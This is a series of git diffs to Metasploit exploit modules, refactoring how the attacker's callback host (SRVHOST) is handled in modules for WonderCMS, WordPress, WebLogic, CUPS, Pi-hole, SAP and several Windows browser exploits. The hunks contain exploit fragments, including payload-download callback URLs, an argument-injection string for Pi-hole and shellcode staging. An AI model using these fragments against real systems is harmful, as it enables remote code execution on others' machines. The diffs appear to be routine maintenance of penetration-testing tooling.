--- a/modules/exploits/multi/http/wondercms_rce.rb
+++ b/modules/exploits/multi/http/wondercms_rce.rb
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi!({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/?installModule=http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@zip_filename}&directoryName=#{Rex::Text.rand_text_alphanumeric(1..8)}&type=themes&token=#{@token}")
+      'uri' => normalize_uri(target_uri.path, "/?installModule=http://#{srvhost}:#{datastore['SRVPORT']}/#{@zip_filename}&directoryName=#{Rex::Text.rand_text_alphanumeric(1..8)}&type=themes&token=#{@token}")
     })
   end
 

--- a/modules/exploits/multi/http/wondercms_rce.rb
+++ b/modules/exploits/multi/http/wondercms_rce.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+      OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
       OptString.new('TARGETURI', [true, 'Path to the WonderCMS application', '/wondercms']),
       OptString.new('PASSWORD', [true, 'Password to log into WonderCMS', '']),
       OptBool.new('CLEANUP', [false, 'Enable payload file cleanup', true])
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi!({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/?installModule=http://#{srvhost}:#{datastore['SRVPORT']}/#{@zip_filename}&directoryName=#{Rex::Text.rand_text_alphanumeric(1..8)}&type=themes&token=#{@token}")
+      'uri' => normalize_uri(target_uri.path, "/?installModule=http://#{srvhost_addr}:#{srvport}/#{@zip_filename}&directoryName=#{Rex::Text.rand_text_alphanumeric(1..8)}&type=themes&token=#{@token}")
     })
   end
 

--- a/modules/exploits/multi/http/wp_popular_posts_rce.rb
+++ b/modules/exploits/multi/http/wp_popular_posts_rce.rb
@@ -68,6 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('USERNAME', [true, 'Username of the account', 'admin']),
       OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),
       OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),
+      OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
       # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560
       OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']),
       # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584
@@ -391,7 +392,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0'
     cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
 
     if cookie.nil?

--- a/modules/exploits/multi/http/wp_popular_posts_rce.rb
+++ b/modules/exploits/multi/http/wp_popular_posts_rce.rb
@@ -68,7 +68,6 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('USERNAME', [true, 'Username of the account', 'admin']),
       OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),
       OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),
-      OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
       # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560
       OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']),
       # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584

--- a/modules/exploits/multi/http/wp_popular_posts_rce.rb
+++ b/modules/exploits/multi/http/wp_popular_posts_rce.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('USERNAME', [true, 'Username of the account', 'admin']),
       OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),
       OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),
-      OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+      OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
       # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560
       OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']),
       # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584

--- a/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
+++ b/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
@@ -300,7 +300,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Want to just point this to the base of our install. WebLogic will append *CLASS NAME*.class to the end of
   # this URL when it tries to fetch the class to be loaded and instantiated.
   def ldap_url_string
-    "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['HTTP_SRVPORT'])}/"
+    "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(srvhost, datastore['HTTP_SRVPORT'])}/"
   end
 
   #

--- a/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
+++ b/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
@@ -107,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(7001),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080])
       ]
     )
@@ -397,10 +398,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Main Exploit
   def exploit
-    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
-      fail_with(Failure::BadConfig, 'SRVHOST must be set to a routable address!')
-    end
-
     if @version.blank?
       @version = get_weblogic_version
     end

--- a/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
+++ b/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(7001),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080])
       ]
     )
@@ -300,7 +300,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Want to just point this to the base of our install. WebLogic will append *CLASS NAME*.class to the end of
   # this URL when it tries to fetch the class to be loaded and instantiated.
   def ldap_url_string
-    "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(srvhost, datastore['HTTP_SRVPORT'])}/"
+    "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(srvhost_addr, datastore['HTTP_SRVPORT'])}/"
   end
 
   #

--- a/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
+++ b/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('PrinterName', [true, 'The printer name', 'PrintToPDF'], regex: /^[a-zA-Z0-9_ ]+$/),
-        OptAddress.new('SRVHOST', [true, 'The local host to listen on (cannot be 0.0.0.0)']),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptPort.new('SRVPORT', [true, 'The local port for the IPP service', 7575])
       ]
     )
@@ -187,10 +187,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def validate
     super
-
-    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
-      raise Msf::OptionValidateError.new({ 'SRVHOST' => 'The SRVHOST option must be set to a routable IP address.' })
-    end
 
     # Rex::Socket does not support forwarding UDP multicast sockets right now so raise an exception if that's configured
     unless _determine_server_comm(datastore['SRVHOST']) == Rex::Socket::Comm::Local

--- a/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
+++ b/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('PrinterName', [true, 'The printer name', 'PrintToPDF'], regex: /^[a-zA-Z0-9_ ]+$/),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptPort.new('SRVPORT', [true, 'The local port for the IPP service', 7575])
       ]
     )

--- a/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
+++ b/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
@@ -179,7 +179,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('PrinterName', [true, 'The printer name', 'PrintToPDF'], regex: /^[a-zA-Z0-9_ ]+$/),
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptPort.new('SRVPORT', [true, 'The local port for the IPP service', 7575])
       ]
     )

--- a/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
+++ b/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
@@ -189,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super
 
     # Rex::Socket does not support forwarding UDP multicast sockets right now so raise an exception if that's configured
-    unless _determine_server_comm(datastore['SRVHOST']) == Rex::Socket::Comm::Local
+    unless _determine_server_comm(srvhost) == Rex::Socket::Comm::Local
       raise Msf::OptionValidateError.new({ 'SRVHOST' => 'SRVHOST can not be forwarded via a session.' })
     end
   end
@@ -510,7 +510,7 @@ class MetasploitModule < Msf::Exploit::Remote
       type: 'A',
       ttl: 30,
       # The IP address of our malicious HTTP IPP service
-      address: datastore['SRVHOST']
+      address: srvhost
     ))
 
     # SRV record

--- a/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb
+++ b/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(5498),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
       ]
     )
@@ -314,7 +314,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # To enable CAM server authentication over SSL, the CAM server certificate has to be previously
       # imported into the server. Since we can't do this, disable SSL in the fake CAM.
       srv_config = " IntegratedSecurityMode=#{auth_method}\n" \
-                   "ServerCAMURI=http://#{srvhost}:#{srvport}\n" \
+                   "ServerCAMURI=http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}\n" \
                    "ServerCAMURIRetryAttempts=10\nServerCAMIPVersion=ipv4\n" \
                    "CAMUseSSL=F\n"
     end

--- a/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb
+++ b/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb
@@ -117,7 +117,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(5498),
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
       ]
     )

--- a/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb
+++ b/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb
@@ -117,6 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(5498),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
       ]
     )
@@ -399,11 +400,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # first let's check if SRVHOST is valid
-    if datastore['SRVHOST'] == '0.0.0.0'
-      fail_with(Failure::Unknown, 'Please enter a valid IP address for SRVHOST')
-    end
-
     # The first step is to query the administrative server to see what apps are available.
     # This action can be done unauthenticated. We then list all the available app servers
     # and pick a random one that is currently accepting clients. This step is important

--- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
+++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
@@ -221,10 +221,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
+++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
@@ -216,19 +216,10 @@ class MetasploitModule < Msf::Exploit::Remote
     resource_uri = '/' + downfile
 
     if (datastore['DOWNHOST'])
-      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+      service_url = "http://#{Rex::Socket.to_authority(datastore['DOWNHOST'], srvport)}#{resource_uri}"
     else
-
-      # we use SRVHOST as download IP for the coming wget command.
-      # SRVHOST needs a real IP address of our download host
-      if (srvhost == '0.0.0.0' or srvhost == '::')
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = srvhost
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
+      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|

--- a/modules/exploits/osx/browser/safari_file_policy.rb
+++ b/modules/exploits/osx/browser/safari_file_policy.rb
@@ -82,23 +82,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Start the FTP server
     start_service()
-    print_status("Local FTP: #{lookup_lhost}:#{datastore['SRVPORT']}")
+    print_status("Local FTP: #{bindhost}:#{bindport}")
 
     # Create our own HTTP server
     # We will stay in this functino until we manually terminate execution
     start_http()
-  end
-
-  #
-  # Lookup the right address for the client
-  #
-  def lookup_lhost(c = nil)
-    # Get the source address
-    if srvhost == '0.0.0.0'
-      Rex::Socket.source_address(c || '50.50.50.50')
-    else
-      srvhost
-    end
   end
 
   #
@@ -277,11 +265,11 @@ class MetasploitModule < Msf::Exploit::Remote
     <base href="file://">
     <script>
     function launch() {
-      document.location = "/Volumes/#{lookup_lhost}/#{@payload_name}";
+      document.location = "/Volumes/#{srvhost_addr}/#{@payload_name}";
     }
 
     function share() {
-      document.location = "ftp://anonymous:anonymous@#{lookup_lhost}/";
+      document.location = "ftp://anonymous:anonymous@#{srvhost_addr}/";
       setTimeout("launch()", 2000);
     }
 

--- a/modules/exploits/osx/browser/safari_file_policy.rb
+++ b/modules/exploits/osx/browser/safari_file_policy.rb
@@ -94,10 +94,10 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def lookup_lhost(c = nil)
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address(c || '50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Default the server host / port
     opts = {
-      'ServerHost' => datastore['SRVHOST'],
+      'ServerHost' => srvhost,
       'ServerPort' => datastore['HTTPPORT'],
       'Comm' => comm
     }.update(opts)

--- a/modules/exploits/unix/http/pihole_blocklist_exec.rb
+++ b/modules/exploits/unix/http/pihole_blocklist_exec.rb
@@ -57,6 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(80),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptPort.new('SRVPORT', [true, 'Web Server Port, must be 80', 80]),
         OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),
         OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])
@@ -151,10 +152,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['SRVPORT'] != 80
       fail_with(Failure::BadConfig, 'SRVPORT must be set to 80 for exploitation to be successful')
-    end
-
-    if datastore['SRVHOST'] == '0.0.0.0'
-      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
     end
 
     start_service({

--- a/modules/exploits/unix/http/pihole_blocklist_exec.rb
+++ b/modules/exploits/unix/http/pihole_blocklist_exec.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # also, looks like if you have a path (/file.php), it won't trigger either, or the / gets
     # messed with.
     data = {
-      'newuserlists' => %(http://#{datastore['SRVHOST']}#" -o #{file} -d "),
+      'newuserlists' => %(http://#{srvhost}#" -o #{file} -d "),
       'field' => 'adlists',
       'token' => token,
       'submit' => 'saveupdate'

--- a/modules/exploits/unix/http/pihole_blocklist_exec.rb
+++ b/modules/exploits/unix/http/pihole_blocklist_exec.rb
@@ -57,7 +57,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(80),
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptPort.new('SRVPORT', [true, 'Web Server Port, must be 80', 80]),
         OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),
         OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])

--- a/modules/exploits/unix/http/pihole_blocklist_exec.rb
+++ b/modules/exploits/unix/http/pihole_blocklist_exec.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(80),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptPort.new('SRVPORT', [true, 'Web Server Port, must be 80', 80]),
         OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),
         OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # also, looks like if you have a path (/file.php), it won't trigger either, or the / gets
     # messed with.
     data = {
-      'newuserlists' => %(http://#{srvhost}#" -o #{file} -d "),
+      'newuserlists' => %(http://#{srvhost_addr}#" -o #{file} -d "),
       'field' => 'adlists',
       'token' => token,
       'submit' => 'saveupdate'

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
-      OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
+      OptAddressLocal.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
       OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
       Opt::RPORT(80),
     ])

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
       begin
         server = Rex::Socket::TcpServer.create(
           'LocalPort' => datastore['SRVPORT'],
-          'LocalHost' => datastore['SRVHOST'],
+          'LocalHost' => srvhost,
           'Context' => {
             'Msf' => framework,
             'MsfExploit' => self

--- a/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
+++ b/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
@@ -68,10 +68,6 @@ class MetasploitModule < Msf::Exploit::Local
     options.remove_option('AutoCheck')
   end
 
-  def srvhost_addr
-    Rex::Socket.source_address(session.session_host)
-  end
-
   def rcpt_to
     "#{rand_text_alpha_lower(8..42)}@[#{srvhost_addr}]"
   end

--- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
+++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    print_status("Starting up our web service on http://#{srvhost}:#{datastore['SRVPORT']}#{resource_uri}...")
+    print_status("Starting up our web service on http://#{bindhost}:#{bindport}#{resource_uri}...")
     start_service
 
     print_status("Requesting a search using our custom XSLT...")
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'site' => m[1],
         'output' => 'xml_no_dtd',
         'q' => rand_text_alpha(rand(15) + 1),
-        'proxystylesheet' => "http://#{srvhost}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
+        'proxystylesheet' => "http://#{srvhost_addr}:#{srvport}#{resource_uri}/style.xml",
         'proxyreload' => '1'
       }
     }, 25)

--- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
+++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
+    print_status("Starting up our web service on http://#{srvhost}:#{datastore['SRVPORT']}#{resource_uri}...")
     start_service
 
     print_status("Requesting a search using our custom XSLT...")
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'site' => m[1],
         'output' => 'xml_no_dtd',
         'q' => rand_text_alpha(rand(15) + 1),
-        'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
+        'proxystylesheet' => "http://#{srvhost}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
         'proxyreload' => '1'
       }
     }, 25)

--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -60,8 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    execute_cmdstager({ temp: '.', tftphost: tftphost })
+    execute_cmdstager({ temp: '.', tftphost: srvhost_addr })
     @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")

--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       js.obfuscate(memory_sensitive: true)
     end
 
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
     mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6) + 3)}.mp4"
     swf_uri = Rex::Text.rand_text_alphanumeric(rand(8) + 4) + ".swf" + "?autostart=true&image=video.jpg&file=#{mp4_uri}"
 

--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -148,8 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       js.obfuscate(memory_sensitive: true)
     end
 
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
-    mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6) + 3)}.mp4"
+    mp4_uri = "http://#{srvhost_addr}:#{srvport}#{get_resource()}/#{rand_text_alpha(rand(6) + 3)}.mp4"
     swf_uri = Rex::Text.rand_text_alphanumeric(rand(8) + 4) + ".swf" + "?autostart=true&image=video.jpg&file=#{mp4_uri}"
 
     html = %Q|

--- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     uri = ((datastore['SSL']) ? "https://" : "http://")
-    uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+    uri << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
     uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{code}"
 
     bd_uri = Zlib::Deflate.deflate(uri)

--- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
@@ -117,9 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
       shellcode << (xor_byte ^ c)
     end
 
-    uri = ((datastore['SSL']) ? "https://" : "http://")
-    uri << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
-    uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{code}"
+    uri = "#{get_uri(cli)}/#{code}"
 
     bd_uri = Zlib::Deflate.deflate(uri)
 

--- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb
+++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
 
     if (request.uri.match(/PAYLOAD/))

--- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb
+++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
@@ -60,9 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
+    payload_url = "#{get_uri(cli)}/PAYLOAD"
 
     if (request.uri.match(/PAYLOAD/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -147,10 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
       send_response(client, smil, { 'Content-Type' => "#{type}/#{subtype}" })
     else
       print_status("Sending initial HTML")
-      url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
-      url << ":" + datastore['SRVPORT'].to_s
-      url << get_resource
+      url = get_uri(client)
       fname = rand_text_alphanumeric(4)
 
       code = generate_rop_payload('msvcrt', payload.encoded, { 'target' => 'xp' })

--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       print_status("Sending initial HTML")
       url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
+      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
       url << ":" + datastore['SRVPORT'].to_s
       url << get_resource
       fname = rand_text_alphanumeric(4)

--- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
@@ -97,10 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Sending init HTML")
 
       shellcode = Rex::Text.to_unescape(p.encoded)
-      url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
-      url << ":" + datastore['SRVPORT'].to_s
-      url << get_resource
+      url = get_uri(client)
       js = <<-ENDJS
           #{js_heap_spray}
